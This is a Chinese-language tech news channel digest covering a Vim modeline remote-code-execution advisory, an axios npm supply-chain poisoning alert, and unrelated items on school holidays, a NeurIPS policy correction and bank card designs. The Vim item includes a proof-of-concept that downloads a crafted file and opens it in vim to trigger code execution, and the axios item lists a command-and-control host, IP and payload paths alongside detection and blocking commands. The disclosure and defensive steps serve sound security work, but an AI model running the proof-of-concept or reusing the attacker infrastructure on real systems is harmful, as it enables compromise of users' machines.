HAT's Public Channel | 🫪

*-cli & *code: 感谢 claude code 大哥开源 🤜，马上开始新版本自研 src: https://www.npmjs.com/package/@anthropic-ai/claude-code/v/2.1.88?activeTab=code

Anthropic：我们刚刚开发出了网络安全领域最强的大模型Claude Mythos
把情报泄露在CMS上
把调试符号开源出来

*-cli & *code: 感谢 claude code 大哥开源 🤜，马上开始新版本自研

src: https://www.npmjs.com/package/@anthropic-ai/claude-code/v/2.1.88?activeTab=code

生草圈😎 rvalue参考快讯📡

致CS新更新策划：

完美做了换弹版本更新的例行问卷，感兴趣的可以自己填一下：
https://surveys.pwesports.cn/survey/FCQzOa

vim存在rce，打开文件即可触发

https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh

poc

vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc

漏洞还是claude发现的，prompt只有一句话

Somebody told me there is an RCE 0-day when you open a file. Find it.

GitHub

Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272

Vim tabpanel modeline escape affects Vim > 9.1.1391 && Vim < 9.2.0272
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
...

严重供应链攻击，axios 两个版本被投毒。

核心信息

| 项目         | 内容                                                                                              |
| ---------- | ----------------------------------------------------------------------------------------------- |
| 恶意版本       | axios@1.14.1 和 axios@0.30.4                                                                     |
| 攻击手法       | 劫持维护者 jasonsaayman 的 npm 账户，绕过 CI/CD 直接发布                                                       |
| 恶意依赖       | plain-crypto-js@4.2.1（伪装成 crypto-js，实际 drop RAT）                                                |
| C2 服务器     | sfrclak.com:8000 (IP: 142.11.206.73)                                                            |
| 平台 payload | macOS: /Library/Caches/com.apple.act.mond<br>Linux: /tmp/ld.py<br>Windows: %PROGRAMDATA%\wt.exe |

你需要做的

1. 立即检查

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 中招"

2. 如果命中
• 降级到安全版本：[email protected] 或 [email protected]
• 系统已受陷 → 从干净状态重建，轮换所有凭证（npm token、AWS 密钥、SSH、云凭证）
• 检查 RAT 持久化文件（见上表路径）
3. CI/CD 加固

npm ci --ignore-scripts  # 禁止 postinstall 脚本
iptables -A OUTPUT -d 142.11.206.73 -j DROP  # 屏蔽 C2

axios 周下载量 3 亿+，影响范围极大。检查完你的项目和CI/CD流水线。

公益短信：警惕“谷圈”交易陷阱！购买二次元周边产品（俗称“谷子”）时，请理性消费、适度热爱，切勿因攀比或沉迷陷入诈骗陷阱。骗子常伪装卖家或拼单团长，以限量拼团预售、高价收谷、稀有低价售卖等名义，诱骗私下转账后卷款失联或发送假冒周边、虚假物流。警方对涉“谷圈”诈骗行为零容忍，将依法严厉打击！请广大青少年切勿轻信低价诱惑，拒绝私下联系转账，认准正规平台交易。【山东省反诈骗中心】

#上海果粉集体升级Apple智能导致上海电信核心网超负载崩溃

*前情提要：https://www.v2ex.com/t/1202367

山东省设立中小学春秋假期
日前，山东省教育厅等13部门联合印发通知，部署设立中小学（含中职学校）春秋假，引导学生走出校园，在春光秋色中感受自然，在社会实践中丰富阅历，促进身心健康成长。鼓励各地幼儿园和高中阶段学校参照执行。
每年设置春假、秋假各一次，原则上每次3天，安排在每学期期中前后。鼓励将春秋假与双休日、法定节假日衔接，形成较长时间假期；也可与学校组织的研学实践、运动会、劳动周等活动统筹安排。具体放假时间，由各市充分考虑本地气候条件、生产安排和学年度教学实际等研究确定，并根据实施情况动态优化调整。
春秋假占用的教学时间，主要通过统筹利用日常机动教学时间等方式补回，确保每学期教学时间总量不变、国家规定教学任务全面完成。
各中小学校要加强学生春秋假期生活指导，鼓励学生多参与贴近自然、贴近生活的社会实践活动。春秋假期间，学校和教师不得以任何形式布置任何作业，不得组织线上或线下授课、补习、考试，或利用其他方式变相组织集体补课。严肃查处春秋假期间面向中小学生的违规学科类培训活动。

https://mp.weixin.qq.com/s/wnxWn6DL2jwTxPXE8AR7Ig

生草圈😎 rvalue参考快讯📡

NeurIPS 已劲爆滑跪 省流： 在编写 NeurIPS 2026 手册时，我们误附了一个美国政府制裁工具的链接，该工具涵盖的限制范围远超 NeurIPS 实际需要遵守的范围。这一错误是由于 NeurIPS 基金会与我们的法律团队沟通不畅造成的；我们从未打算在强制性合规义务之外限制任何人的参与。作为组织，我们对此错误负有责任，并对由此造成的恐慌和对社区的影响深表歉意。 https://x.com/NeurIPSConf/status/2037438893457289364

中国计算机学会注意到，NeurIPS 基金会在社交平台 X 及NeurIPS 2026官网上，就 NeurIPS 2026 会议限制部分受制裁机构投稿一事发布了解释与更正。中国计算机学会欢迎 NeurIPS 的投稿政策回归国际学术交流的通行做法。

中国计算机学会始终倡导在开放、公平的环境下开展国际学术交流，鼓励中国学术界积极参与包括NeurIPS在内的国际学术交流与合作，同时将积极推进学会自主和开放的国际学术交流平台的建设与发展。

https://www.ccf.org.cn/Media_list/ccf/2026-03-30/869614.shtml

www.ccf.org.cn

NeurIPS更正投稿政策，CCF表示欢迎-中国计算机学会

中国计算机学会欢迎 NeurIPS 的投稿政策回归国际学术交流的通行做法。

听说 Epic 大裁员把著名的国区老运营一起裁了

招行下架明日方舟等借记卡卡面

近数月以来，招商银行已下架皮卡丘、萌气（猫爪、浅夏倚梦、春日萌动）等多款借记卡卡面。近日，招行已下架明日方舟联名卡面（阿米娅、罗德岛）。

上述下架卡面无法网申，可能无法保留卡面换同卡号卡片。若线下仍有卡板，目前仍可线下开预制卡或换号换卡。

截至发稿时，哔哩哔哩2233花嫁、Hello Kitty、愤怒的小鸟、宠物（猫咪、狗狗）、海绵宝宝等卡面仍可办理。

#招商